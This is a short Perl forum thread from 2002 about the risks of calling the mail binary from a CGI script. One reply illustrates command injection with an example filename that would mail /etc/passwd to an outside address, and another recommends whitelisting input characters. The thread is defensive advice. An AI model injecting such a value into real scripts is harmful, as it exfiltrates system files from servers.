Re: Yet another email question

in reply to Yet another email question

Hi !

I cant believe that this works, you have not specified any recipients ? Or ary you using some custom mail ?

Aside from this:

You really should be using a module, especially when using this in a CGI-Script
If you absolutely must use the mail binary, make sure to check the variables. If you don't check the user input here, someone could, for example, give you a dirname of "; mail foo@hacker.com < /etc/passwd". So strip out at least: [&;<>"'`|]
use the absolute path to your mail binary, something like /usr/bin/mail

---- amphiplex

Comment on Re: Yet another email question Download Code

Replies are listed 'Best First'.
Re^2: Yet another email question by Aristotle (Chancellor) on Jul 23, 2002 at 13:49 UTC
No no no. Don't strip out blacklisted characters. Instead, strip out any but whitelisted ones. For example, `s/\W+//g`. It is too easy to overlook something otherwise. bikeguy: you probably want to read perlsec. Also, Ovid's excellent CGI course has a good easily digestible discussion of CGI script security. Makeshifts last the longest.	[reply] [d/l]

In Section Seekers of Perl Wisdom